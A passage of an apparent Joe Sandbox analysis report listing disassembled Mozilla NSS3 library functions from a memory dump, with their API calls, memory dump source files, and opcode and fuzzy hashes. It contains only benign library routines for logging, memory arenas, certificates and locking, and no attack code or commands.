                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                                                                                                            • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                                                                                                            • API String ID: 1907330108-3943720641
                                                                                                                                                                                                                            • Opcode ID: a0dfbfbb204046a992ffc9075232c57972df74f77fcf2cbc2dac60516b94ad01
                                                                                                                                                                                                                            • Instruction ID: 995c808b39d6472c0280008020aaaa63812ed2926c6cbc3437d17e3ea14af9ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0dfbfbb204046a992ffc9075232c57972df74f77fcf2cbc2dac60516b94ad01
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F01B1753011C09FDF109B64D959B5933B9EBC331AF094035E809D7B21EB31DA8AD792
                                                                                                                                                                                                                            Function 6CC37DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37E10
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37EA6
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37EB5
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CC37ED8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulong
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4101233201-0
                                                                                                                                                                                                                            • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                            • Instruction ID: 53ed42097839626992786cc1adef8952620191f2caa7b47bf77bb07328db2eee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D31A2B2A00225CFDB04CF09D9909DABBA2FF8831871A816AC85C5B751FB71EC45CBD1
                                                                                                                                                                                                                            Function 6CB66C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB66C8D
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB66CA9
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB66CC0
                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CC88FE0), ref: 6CB66CFE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2370200771-0
                                                                                                                                                                                                                            • Opcode ID: 6a271f3b94557776c52005c92e672183e8abd752070449b566ddc9479933021c
                                                                                                                                                                                                                            • Instruction ID: d2bb76eec0e4e1066b3ac512d4b5a9b8d8e61a60dbf426f4d6d8182959f8327c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a271f3b94557776c52005c92e672183e8abd752070449b566ddc9479933021c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C331A1B5A002169FDB08CF66C891ABFBBF9EF85248B10443DD905E7B40EB31D905CBA1
                                                                                                                                                                                                                            Function 6CBD6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E36
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBD6E57
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E7D
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6EAA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3163584228-0
                                                                                                                                                                                                                            • Opcode ID: 271c5e7654859fa13c0f3f0591e2700a32fb3fb4e52a722952dadde47ada4944
                                                                                                                                                                                                                            • Instruction ID: 2e3d3eacb497c9f63e319e9c3771954fc661fc3d10a3ab5e0e2ee0e9fbff5ed1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 271c5e7654859fa13c0f3f0591e2700a32fb3fb4e52a722952dadde47ada4944
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E319171610693EFDB145F34DC043A6B7A4EB1131AF120E3DD499D6A41EB317958CF82
                                                                                                                                                                                                                            Function 6CBBDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDDF4
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDE0B
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDE17
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CBBDE80
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3725328900-0
                                                                                                                                                                                                                            • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                            • Instruction ID: b3607b2350cc044d9b0216139126dec4ded8cee33130341a57cef180a98cc721
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31DBB1A017829BEB00CF26D8C0666F7E4FFA531CB148229E85C57B05EB74F494CB91
                                                                                                                                                                                                                            Function 6CBD2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CBD2E08
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CBD2E1C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CBD2E3B
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBD2E95
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC1228
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBC1238
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC124B
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC125D
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBC126F
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBC1280
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBC128E
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBC129A
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBC12A1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1441289343-0
                                                                                                                                                                                                                            • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                            • Instruction ID: 633dc6f9f4a6d8ba95c7c119a4f5d328ad03c3bcdbeebd3367dd699adca0c9a5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421D7B5E103C64BE700CF549D447AA3764AF9130CF160269DD08AB742F7B1E9948293
                                                                                                                                                                                                                            Function 6CB8ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_NewCertList.NSS3 ref: 6CB8ACC2
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB62F0A
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB62F1D
                                                                                                                                                                                                                              • Part of subcall function 6CB62AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB60A1B,00000000), ref: 6CB62AF0
                                                                                                                                                                                                                              • Part of subcall function 6CB62AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB62B11
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CB8AD5E
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB6B41E,00000000,00000000,?,00000000,?,6CB6B41E,00000000,00000000,00000001,?), ref: 6CBA57E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBA5843
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(?), ref: 6CB8AD36
                                                                                                                                                                                                                              • Part of subcall function 6CB62F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB62F65
                                                                                                                                                                                                                              • Part of subcall function 6CB62F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB62F83
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB8AD4F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 132756963-0
                                                                                                                                                                                                                            • Opcode ID: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
                                                                                                                                                                                                                            • Instruction ID: cd4aba03593e456cf25b62aaa5aeedc126372f88f2e589dc3ed189b1be978cbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19380ce2bd9b63ce9787ba4cd01c53f8b7a752faa7614d681a862e74a5cd3b78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D321E4B1D022548BEF10DFA5D8059EEB7B4EF15618F054068D805BBB41FB31AA49CFE6
                                                                                                                                                                                                                            Function 6CBB3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBB3C9E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBB3CAE
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBB3CEA
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBB3D02
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                                                                            • Opcode ID: f2ac05faead228f0b445627b7732d1ae185cae1f3d39a732056caf3c6c4d1fe4
                                                                                                                                                                                                                            • Instruction ID: 54e4020e79abbe57dabe8a7c2167be05b99be3fe390d5075f8421f6076cf0897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ac05faead228f0b445627b7732d1ae185cae1f3d39a732056caf3c6c4d1fe4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0411D675A00254AFD700DF64DC44EAA3778EF09368F154060EC0897712EB31ED54C7E1
                                                                                                                                                                                                                            Function 6CBBECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CBBF0AD,6CBBF150,?,6CBBF150,?,?,?), ref: 6CBBECBA
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CBBECD1
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CBBED02
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CBBED5A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2957673229-0
                                                                                                                                                                                                                            • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                            • Instruction ID: a99ee5c7454f922a3a38e87f39057741101388af43f0342ce4c5c0cd0cc9f8f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E021D4B1A007D25BE700CF25D944B6AB7E4FFA4308F15C256E81C97661EBB0E594C6D2
